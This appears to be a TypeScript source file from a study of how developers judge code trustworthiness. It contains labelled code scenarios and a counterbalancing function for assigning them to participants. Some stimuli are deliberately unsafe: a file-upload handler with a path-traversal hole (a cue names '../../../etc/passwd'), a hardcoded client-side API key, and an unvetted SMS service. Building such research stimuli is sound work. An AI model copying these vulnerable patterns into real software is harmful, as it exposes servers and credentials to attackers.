// "Edge cases exist - see RFC 5322"`,
    context: 'Need email validation. Top Stack Overflow answer with 12K upvotes. Comments warn about complexity but it\'s the accepted answer.',
    isRisky: false,
    hasWarning: true,
    congruence: 'incongruent',
    safetyIndicators: ['communityVetted', 'highUpvotes', 'acceptedAnswer', 'functionalCode'],
    gistCues: ['Complex regex', 'Maintainability warnings', 'Edge case concerns', 'Community cautions'],
    verbatimCues: ['12K upvotes (highly vetted)', 'Accepted answer (OP confirmed)', 'Works for 99% of cases', 'Not malicious, just complex'],
    conflictLevel: 'high',
    complexity: 0.73
  },

  // CDom7 - Incongruent-Risky
  {
    id: 'c30',
    domain: 'CDom7',
    title: 'File Upload Handler from Dev.to Article',
    type: 'snippet',
    source: 'Dev.to Article (2.3K reactions)',
    description: 'Express.js file upload with progress tracking',
    codeSnippet: `// From Dev.to trending article: "Perfect File Upload Solution"
// 2,300 reactions, author: [@codewizard_pro]

const express = require('express');
const app = express();

app.post('/upload', express.raw({ limit: '100mb' }), (req, res) => {
  const filename = req.headers['x-filename'];
  const filepath = './uploads/' + filename;

  require('fs').writeFileSync(filepath, req.body);

  res.json({ success: true, path: filepath });
});

// Clean and simple - handles any file type!`,
    context: 'Building file upload feature. Dev.to article has 2,300 reactions and looks professional. Code is clean and straightforward.',
    isRisky: true,
    hasWarning: false,
    congruence: 'incongruent',
    riskIndicators: ['pathTraversal', 'noValidation', 'arbitraryFileWrite', 'rce'],
    gistCues: ['Popular Dev.to article', '2,300 reactions', 'Clean simple code', 'Professional author'],
    verbatimCues: ['Path traversal vulnerability (../../../etc/passwd)', 'No filename sanitization', 'No file type validation', 'Arbitrary code execution risk'],
    threatType: 'arbitrary-file-write',
    recommendation: 'Use multer with proper validation. Sanitize filenames. Restrict file types.',
    conflictLevel: 'high',
    complexity: 0.91
  },

  // ==========================================
  // CDOM8: API INTEGRATION & WEB SERVICES (4 needed)
  // ==========================================

  // CDom8 - Congruent-Safe
  {
    id: 'c31',
    domain: 'CDom8',
    title: 'Stripe Payment Integration (Official SDK)',
    type: 'api',
    source: 'Stripe Official Documentation',
    description: 'Accept credit card payments with Stripe',
    codeSnippet: `// Stripe official Node.js SDK
const stripe = require('stripe')(process.env.STRIPE_SECRET_KEY);

app.post('/create-payment', async (req, res) => {
  const paymentIntent = await stripe.paymentIntents.create({
    amount: 2000,
    currency: 'usd',
    payment_method_types: ['card'],
  });

  res.json({ clientSecret: paymentIntent.client_secret });
});`,
    context: 'Adding payment processing to e-commerce site. Using Stripe official SDK from their documentation.',
    isRisky: false,
    hasWarning: false,
    congruence: 'congruent',
    safetyIndicators: ['stripeOfficial', 'properSDK', 'envVariables', 'industryLeader'],
    gistCues: ['Stripe official SDK', 'Environment variables', 'Payment processing', 'Official documentation'],
    verbatimCues: ['stripe.com official SDK', 'Used by millions of businesses', 'PCI-compliant approach', 'Industry standard'],
    conflictLevel: 'low',
    complexity: 0.25
  },

  // CDom8 - Congruent-Risky
  {
    id: 'c32',
    domain: 'CDom8',
    title: 'Free SMS API from Random Website',
    type: 'api',
    source: 'freesmsapi.net',
    description: 'Send SMS notifications without paying for Twilio',
    codeSnippet: `// Found this free alternative to expensive Twilio
const axios = require('axios');

async function sendSMS(phone, message) {
  const response = await axios.post('https://freesmsapi.net/send', {
    apiKey: 'get-free-key-at-website',
    phone: phone,
    message: message,
    // No cost, unlimited SMS!
  });

  return response.data;
}`,
    context: 'Twilio costs $0.0075 per SMS. Found this free API online claiming unlimited SMS. Website looks professional.',
    isRisky: true,
    hasWarning: true,
    congruence: 'congruent',
    riskIndicators: ['dataScraping', 'suspiciousAPI', 'tooGoodToBeTrue', 'unknownService'],
    gistCues: ['Unknown service', 'Free unlimited SMS', 'No major company uses this', 'Suspicious pricing'],
    verbatimCues: ['freesmsapi.net unverified', 'Collects phone numbers + messages', 'No legitimate free SMS service', 'Data harvesting operation'],
    threatType: 'data-harvesting',
    recommendation: 'Use legitimate services like Twilio, AWS SNS, or MessageBird',
    conflictLevel: 'low',
    complexity: 0.4
  },

  // CDom8 - Incongruent-Safe
  {
    id: 'c33',
    domain: 'CDom8',
    title: 'SendGrid Email API (Rate Limit Warning)',
    type: 'api',
    source: 'SendGrid Official Node.js SDK',
    description: 'Transactional email service integration',
    codeSnippet: `// SendGrid official SDK
const sgMail = require('@sendgrid/mail');
sgMail.setApiKey(process.env.SENDGRID_API_KEY);

async function sendEmail(to, subject, text) {
  const msg = {
    to: to,
    from: 'noreply@company.com',
    subject: subject,
    text: text,
  };

  // ⚠️ WARNING: Free tier limited to 100 emails/day
  // ⚠️ CAUTION: Rate limit exceeded = API key suspension
  // ⚠️ ERROR: Each violation logged and reviewed

  await sgMail.send(msg);
}`,
    context: 'Company uses SendGrid for email. Official SDK but warnings about rate limits and account suspension look concerning.',
    isRisky: false,
    hasWarning: true,
    congruence: 'incongruent',
    safetyIndicators: ['sendGridOfficial', 'legitimateAPI', 'companyApproved', 'properSDK'],
    gistCues: ['Rate limit warnings', 'Account suspension threats', 'API key suspension', 'Violation logging'],
    verbatimCues: ['SendGrid official SDK', 'Industry-standard email service', 'Warnings are informational', 'Company pays for service'],
    conflictLevel: 'high',
    complexity: 0.68
  },

  // CDom8 - Incongruent-Risky
  {
    id: 'c34',
    domain: 'CDom8',
    title: 'Google Maps API (Copilot Suggestion)',
    type: 'ai-suggestion',
    source: 'GitHub Copilot',
    description: 'Add interactive maps to website',
    codeSnippet: `// Copilot suggests: "Add Google Maps to your site"
<script>
  function initMap() {
    const map = new google.maps.Map(document.getElementById('map'), {
      center: { lat: 37.7749, lng: -122.4194 },
      zoom: 12
    });
  }
</script>

<!-- Copilot autocompletes the script tag: -->
<script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyD4iE9KnA_Jc7qPvN8mL2gH5fR3tY6uX0w&callback=initMap"></script>`,
    context: 'Adding map to website. Copilot suggests code with embedded API key. Code works perfectly in testing.',
    isRisky: true,
    hasWarning: false,
    congruence: 'incongruent',
    riskIndicators: ['exposedAPIkey', 'publicCredentials', 'billingAbuse', 'quotaTheft'],
    gistCues: ['Copilot recommendation', 'Working code', 'Official Google Maps API', 'Clean implementation'],
    verbatimCues: ['API key hardcoded in client', 'Public exposure of credentials', 'Anyone can steal and abuse key', '$200/day abuse potential'],
    threatType: 'credential-exposure',
    recommendation: 'Never expose API keys client-side. Use backend proxy or restricted keys.',
    conflictLevel: 'high',
    complexity: 0.89
  }
];

// Helper: Seeded shuffle using Fisher-Yates algorithm
// Provides deterministic randomization based on participant ID
function seededShuffle<T>(array: T[], seed: number): T[] {
  const arr = [...array]; // Copy to avoid mutation
  let currentSeed = seed;

  // Mulberry32 PRNG (pseudorandom number generator)
  const random = () => {
    currentSeed |= 0;
    currentSeed = (currentSeed + 0x6d2b79f5) | 0;
    let t = Math.imul(currentSeed ^ (currentSeed >>> 15), currentSeed | 1);
    t ^= t + Math.imul(t ^ (t >>> 7), t | 61);
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
  };

  // Fisher-Yates shuffle with seeded random
  for (let i = arr.length - 1; i > 0; i--) {
    const j = Math.floor(random() * (i + 1));
    [arr[i], arr[j]] = [arr[j], arr[i]];
  }

  return arr;
}

// Function to get balanced scenarios using Latin Square counterbalancing
// NEW APPROACH: Shows 4 scenarios (1 per condition) from 4 domains, with guaranteed cross-participant balance
// GUARANTEES:
// - Each participant sees exactly 1 Congruent-Safe, 1 Congruent-Risky, 1 Incongruent-Safe, 1 Incongruent-Risky
// - Across every 8 participants, each domain appears exactly once with each condition (perfect balance)
// - Overall: Each domain appears 12.5% of the time (4/8 rotation patterns)
// - Within-domain: Each condition appears 25% of the time (1/4 conditions)
export function getScenariosByCongruence(participantId?: string): CodingScenario[] {
  // Create seed from participant ID for consistent randomization
  let seedValue = 0;
  if (participantId) {
    for (let i = 0; i < participantId.length; i++) {
      seedValue += participantId.charCodeAt(i);
    }
  } else {
    seedValue = Math.floor(Math.random() * 1000000);
  }

  // Group scenarios by domain
  const domainMap: { [key: string]: CodingScenario[] } = {};
  codingScenarios.forEach(scenario => {
    if (!domainMap[scenario.domain]) {
      domainMap[scenario.domain] = [];
    }
    domainMap[scenario.domain].push(scenario);
  });

  // All 8 domains for coding scenarios
  const allDomains = ['CDom1', 'CDom2', 'CDom3', 'CDom4', 'CDom5', 'CDom6', 'CDom7', 'CDom8'];

  // All 4 conditions
  const allConditions = ['Congruent-Safe', 'Congruent-Risky', 'Incongruent-Safe', 'Incongruent-Risky'];

  // Calculate rotation index from participant ID (0-7)
  // This ensures perfect counterbalancing across every 8 participants
  const rotationIndex = seedValue % 8;

  // Latin Square rotation patterns
  // Each pattern selects 4 domains and assigns one condition to each
  // Pattern 0: CDom1(CS), CDom2(CR), CDom3(IS), CDom4(IR)
  // Pattern 1: CDom2(CS), CDom3(CR), CDom4(IS), CDom5(IR)
  // ...and so on, cycling through domains
  const conditionAssignments = [];
  for (let i = 0; i < 4; i++) {
    const domainIndex = (rotationIndex + i) % 8; // Cycle through domains
    const domain = allDomains[domainIndex];
    const condition = allConditions[i]; // Assign conditions in order: CS, CR, IS, IR

    conditionAssignments.push({
      domains: [domain],
      condition: condition
    });
  }

  // Select scenarios based on Latin Square assignments
  const selected: CodingScenario[] = [];

  conditionAssignments.forEach(assignment => {
    assignment.domains.forEach(domain => {
      const domainScenarios = domainMap[domain];

      // Find scenario matching the assigned condition
      const [congruence, risk] = assignment.condition.split('-');
      const matchingScenario = domainScenarios.find(s => {
        const isCongruent = s.congruence === 'congruent';
        const isSafe = !s.isRisky;

        const matchesCongruence =
          (congruence === 'Congruent' && isCongruent) ||
          (congruence === 'Incongruent' && !isCongruent);

        const matchesRisk =
          (risk === 'Safe' && isSafe) ||
          (risk === 'Risky' && !isSafe);

        return matchesCongruence && matchesRisk;
      });

      if (matchingScenario) {
        selected.push(matchingScenario);
      } else {
        console.error(`No matching scenario found for ${domain} with condition ${assignment.condition}`);
      }
    });
  });

  // Shuffle the selected scenarios so they're not always in the same order
  const shuffledSelected = seededShuffle(selected, seedValue + 3000);

  // Verify we have exactly 4 scenarios
  if (shuffledSelected.length !== 4) {
    throw new Error(`Expected 4 scenarios, got ${shuffledSelected.length}. Participant: ${participantId}`);
  }

  // Verify distribution: exactly 1 of each condition
  const counts = {
    'Congruent-Safe': 0,
    'Congruent-Risky': 0,
    'Incongruent-Safe': 0,
    'Incongruent-Risky': 0
  };

  shuffledSelected.forEach(s => {
    const isCongruent = s.congruence === 'congruent';
    const isSafe = !s.isRisky;
    const key = `${isCongruent ? 'Congruent' : 'Incongruent'}-${isSafe ? 'Safe' : 'Risky'}`;
    counts[key as keyof typeof counts]++;
  });

  // Assert exactly 1 of each condition
  Object.entries(counts).forEach(([condition, count]) => {
    if (count !== 1) {
      throw new Error(`Expected 1 scenario for ${condition}, got ${count}. Participant: ${participantId}`);
    }
  });

  return shuffledSelected;
}

// Deprecated: balanceScenarios is no longer needed
// getScenariosByCongruence now guarantees balanced 2×2×2×2 distribution
export function balanceScenarios(scenarios: CodingScenario[]): CodingScenario[] {
  return scenarios;
}